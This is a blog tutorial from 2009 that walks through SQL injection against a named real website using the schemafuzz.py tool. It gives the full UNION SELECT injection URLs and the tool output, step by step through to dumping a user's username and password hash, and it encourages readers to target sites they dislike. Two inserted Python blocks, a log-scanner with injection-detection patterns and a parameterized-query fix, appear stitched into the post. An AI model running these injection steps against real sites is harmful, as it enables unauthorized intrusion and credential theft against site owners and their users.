Web Hacking with Schemafuzzy Method

November 15, 2009 at 7:11 pm | Posted in Article, computer and high technology, Hacking, Tutorial

Hi-tech greetings...

Hacking a website with the schemafuzzy method is surely nothing new to us. The online world, and hacking in particular, keeps getting more popular. This is a short tutorial I got from YF Probolinggo, written by our friend phychole. OK, to do this there are a few things we need.

1. A computer (PC, notebook or netbook)
2. An internet connection (pick the ISP you trust)
3. Python-2.5 (you can ask uncle Google)
4. The schemafuzz.py script (get it from darkc0de.com)
5. CMD
6. A target website (find one on Google, or use the site you hate most)
7. Coffee (recommended)
8. CIGARETTES (recommended)
9. Snacks (mandatory)
10. A companion (required)

OK, everything is ready, right?

Let's get straight to it. First install your python-2.5. Copy python.py into the python-2.5 directory. Once that is done, run it right away. Here is how:

click Start >> Run >> CMD

Now you are in cmd. First reset cmd to the root with the command "cd\" (without the quotes) so that the prompt becomes

c:\

then enter the python-2.5 directory with the command "cd python-2.5" until you see

c:\python-2.5

This is where we start working. OK, have you got a target? Let's begin.

The basic schemafuzzy command is

schemafuzz.py -u "target" --command

1. We use it on our target. Here I take the target

http://www.primausada.com/news.php?news_id=9

2. Check the columns

schemafuzz.py -u "http://www.primausada.com/news.php?news_id=9" --findcol

Until this appears
============================================================

|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|

[+] URL:http://www.primausada.com/news.php?news_id=9--
[+] Evasion Used: "+" "--"
[+] 20:36:08
[+] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3
[-] Done!

==========================================================

Now... use
http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3
to dissect our target website.
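Seen from the server side, the request shape in the tool output above (a false predicate such as AND 1=2, followed by UNION SELECT and the darkc0de marker) stands out in a web server access log. The following is an added example, not part of the original post or of schemafuzz.py: a Python 3 scanner run over constructed Apache combined-format log lines. The rule names, sample paths and client addresses are assumptions made up for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Nov/2009:20:30:01 +0700] "GET /news.php?news_id=9 HTTP/1.1" 200 5120 "-" "-"
203.0.113.7 - - [15/Nov/2009:20:31:44 +0700] "GET /search.php?q=student+union+and+1=1+offer HTTP/1.1" 200 900 "-" "-"
198.51.100.23 - - [15/Nov/2009:20:36:08 +0700] "GET /news.php?news_id=9+AND+1=2+UNION+SELECT+0,1,2,3-- HTTP/1.1" 200 812 "-" "-"
198.51.100.23 - - [15/Nov/2009:20:36:09 +0700] "GET /news.php?news_id=9%20and%201%3D2%20union%20select%200,1,2,3-- HTTP/1.1" 200 812 "-" "-"
198.51.100.23 - - [15/Nov/2009:20:42:20 +0700] "GET /news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3 HTTP/1.1" 200 812 "-" "-"
"""

# Rule names are illustrative; the patterns come from the URLs in the tool output above.
RULES = {
    "false_predicate": re.compile(r"\band\s+(\d+)\s*=\s*(?!\1\b)\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_probe": re.compile(r"\binformation_schema\b", re.I),
    "tool_marker": re.compile(r"\bdarkc0de\b", re.I),
}
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')


def scan(log_text):
    """Return (hits, per_client); each hit is (client, request target, rule names)."""
    hits, per_client = [], Counter()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, target = m.groups()
        query = target.partition("?")[2]
        # Decode twice so +, %20 and double-encoded (%2520) spacing all normalise.
        decoded = unquote_plus(unquote_plus(query))
        matched = sorted(name for name, rx in RULES.items() if rx.search(decoded))
        if matched:
            hits.append((client, target, matched))
            per_client[client] += 1
    return hits, per_client


if __name__ == "__main__":
    found, clients = scan(SAMPLE_LOG)
    for client, target, rules in found:
        print(client, ",".join(rules), target)
    print(dict(clients))
```

The per-client counter matters as much as the signatures: the schema enumeration later on this page reports 59 requests in about a minute from a single client.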

3. Find the database

schemafuzz.py -u "http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --dbs

until this appears

==========================================================

|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|

[+] URL:http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 20:42:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] t59395_primausada

[-] [20:42:22]
[-] Total URL Requests 3
[-] Done

==========================================================

There, we have found the site's database: t59395_primausada 😛

4. Find the table names in the database

schemafuzz.py -u "http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --schema -D t59395_primausada

this will appear

==========================================================

|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|

[+] URL:http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 20:45:26
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database “t59395_primausada”
[+] Number of Tables: 10

[Database]: t59395_primausada
[Table: Columns]
[0]detoks: detoks_id,topic_id,detoks_content,insert_by,update_by
[1]detoks_topic: topic_id,topic
[2]klinik: klinik_id,topic_id,klinik_content,insert_by,update_by
[3]klinik_topic: topic_id,topic
[4]news: news_id,news_date,update_date,news_title,news_summary,news_content,insert_by,update_by,front_yn
[5]product: product_id,product_img,product_name,product_cat,product_desc,product_use,product_price,insert_by,update_by
[6]product_category: category_codes,category_desc,insert_by,update_by
[7]profile: content_id,content,insert_by,update_by
[8]testimonial: testi_id,patient_name,patient_age,patient_gender,patient_reg_date,patient_phone,testi_date,testi_content,testi_pict_link,update_by,insert_by
[9]user_account: user_id,username,password,first_name,last_name,create_date

[-] [20:46:40]
[-] Total URL Requests 59
[-] Done

==========================================================

There, all the columns come out... from here we learn that the site has 10 columns. Now we just pick the column we are going to exploit...

5. Exploit the table and columns

schemafuzz.py -u "http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --dump -D t59395_primausada -T user_account -C username,password

and this will appear

==========================================================

|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|

[+] URL:http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 20:51:54
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database “t59395_primausada” Table “user_account”
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] adhika:*E1EE7BF406887B7D4B90343450ADC71C267B9087:*E1EE7BF406887B7D4B90343450ADC71C267B9087:

[-] [20:52:01]
[-] Total URL Requests 3
[-] Done

==========================================================

Look at "adhika:*E1EE7BF406887B7D4B90343450ADC71C267B9087:*E1EE7BF406887B7D4B90343450ADC71C267B9087:"

This is the username and password... out it comes. All that is left is to decrypt the MD5 back to its original form... hehehe. This method only works for SQL version 5. For version 4, you can ask Google. Sigh, SQL 4 is really hard. We can't do it yet either, because it is blind 😛
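Every step above works only because the value of news_id becomes part of the SQL text. The following is an added example, not from the original post and not the site's code: it contrasts a concatenated query with a validated, bound parameter, using Python 3's sqlite3 and a constructed news table as a stand-in for the PHP/MySQL site. The function names and the shape of the concatenated query are assumptions, since the page does not show the site's source.

```python
import re
import sqlite3

# Decoded form of the column-count probe shown in the tool output above.
PROBE = "9 AND 1=2 UNION SELECT 0,1,2,3"
COLS = "news_id, news_date, news_title, news_content"


def make_db():
    """Constructed stand-in for the site's news table (SQLite here, MySQL there)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (news_id INTEGER PRIMARY KEY, news_date TEXT,"
               " news_title TEXT, news_content TEXT)")
    db.execute("INSERT INTO news VALUES (9, '2009-11-15', 'Sample title', 'Sample body')")
    return db


def get_news_concat(db, news_id):
    """Before: the request value is pasted into the SQL text (assumed shape;
    the page does not show the site's code)."""
    sql = "SELECT " + COLS + " FROM news WHERE news_id = " + news_id
    return db.execute(sql).fetchall()


def get_news_bound(db, news_id):
    """After: accept only a short run of ASCII digits, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", news_id):
        return []  # anything but a plain number never reaches the database
    sql = "SELECT " + COLS + " FROM news WHERE news_id = ?"
    return db.execute(sql, (int(news_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concat:", get_news_concat(db, PROBE))  # row chosen by the request comes back
    print("bound: ", get_news_bound(db, PROBE))   # rejected, no rows
    print("bound: ", get_news_bound(db, "9"))     # the legitimate request still works
```

With the bound form the probe is treated as data rather than SQL, so the column count is never disclosed and the later enumeration steps have nothing to build on.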

OK, that's all from me.

Any misuse of this article is not the author's responsibility.

Hope it is useful to you.

Adapted from YF Probolinggo, written by phychole
